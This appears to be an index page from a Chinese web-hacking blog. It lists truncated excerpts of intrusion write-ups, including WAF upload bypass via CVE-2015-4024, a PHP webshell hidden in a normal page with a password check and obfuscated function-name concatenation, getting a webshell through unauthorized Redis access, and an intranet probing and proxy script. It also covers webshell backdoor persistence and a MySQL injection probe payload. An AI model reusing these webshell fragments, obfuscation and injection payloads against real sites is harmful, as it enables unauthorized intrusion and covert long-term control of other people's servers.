php遇上iis之上传突破

php遇上iis之上传突破

PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

极其隐蔽的pHp小马穿插在正常页面中

<?php
$pssddd="2b";//密码
if($_GET["hks"]==$pssddd){@set_time_limit(100);$slstss="fi"."le_"."ge"."t_c"."onten"."ts";$raworistr='

redis写shell的小技巧

最近碰到一个redis未授权访问,想近各种办法最后终于成功了写了webshell,这里写下一点点小经验。

首先,写shell的基本方式,还是按照phithon发的文章,安全脉搏的《利用redis写webshell》

这种方法对于没有存多少数据的redis数据库来说还是很适用的,但是当数据库比较大时,就会遇到一些问题(比如本例中数据库下载下来大小约为200M,还算比较大的)。

首先就是这么大的数据量,里面不可避免会出现这样的字符串“<?”,php遇到这个字符串时就把后面的内容当php脚本解析了,自然会报错,不能运行,对于这个问题,没别的办法,只能找到出错的地方的键值,删掉,然后再写shell。


权5站点全站不可写拿webshell方法

看到一个站点,(此处忽略一万字)先爬虫一下。

使用这个工具

发现一个info目录很可疑,打开以后凭借我多年的日站经验、敏锐的观察力、超强的分析力; 断定这是WordPress
此博客程序没有什么好的漏洞,好用的XSS又需要管理员交互
于是使用以下脚本:


php内网探测脚本&简单代理访问

<?php
$url = isset($_REQUEST['u'])?$_REQUEST['u']:null;
$ip = isset($_REQUEST['i'])?$_REQUEST['i']:null;

if($url != null){

另类姿势GetShell php大马

Webshell后门隐藏与维持

前言

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.

以PHP-WEBBACKDOOR为例,抛砖引玉

简明手册:如何在PHP应用中防止SQL注入

  Tags:

mysql暴库总结

1.判断版本 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
  Tags: